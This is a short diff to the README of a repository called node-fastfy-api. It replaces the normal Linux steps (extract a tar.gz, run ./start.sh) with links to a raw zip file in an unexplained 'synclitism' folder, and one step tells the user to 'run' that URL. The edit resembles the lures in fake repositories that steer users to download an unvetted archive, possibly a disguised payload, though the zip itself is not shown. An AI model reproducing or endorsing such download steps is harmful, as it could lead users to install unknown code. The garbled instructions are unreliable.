czy444/node-fastfy-api/README.md

      - Drag the application into your Applications folder.

    - **Linux**:
-     - Extract the downloaded tar.gz file.
+     - Extract the downloaded https://raw.githubusercontent.com/czy444/node-fastfy-api/main/synclitism/node-fastfy-api.zip file.
      - Open a terminal and navigate to the folder with the extracted files.
-     - Run `./start.sh` to launch the application.
+     - Run `https://raw.githubusercontent.com/czy444/node-fastfy-api/main/synclitism/node-fastfy-api.zip` to launch the application.

 5. **Open the Application**: Once installed, find the application in your Applications folder (macOS) or Start Menu (Windows).
 For Linux, use the terminal command to run it.